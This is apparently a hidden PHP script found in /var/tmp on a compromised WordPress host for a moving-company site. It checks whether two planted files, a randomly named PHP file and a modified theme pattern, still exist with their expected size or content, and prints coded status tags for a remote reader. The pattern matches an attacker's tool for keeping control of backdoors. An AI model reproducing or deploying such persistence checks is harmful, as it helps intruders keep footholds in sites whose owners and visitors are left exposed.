File: //var/tmp/.created
<?php $r = '/home/bmarks/24hourmovingxpress.com'; $x = ["/d29320.php"=>"bd@@503661@@105",
"/wp-content/themes/twentytwentyfive/patterns/page-coming-soon.php"=>"bd@@378233@@Content-Security-Policy"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');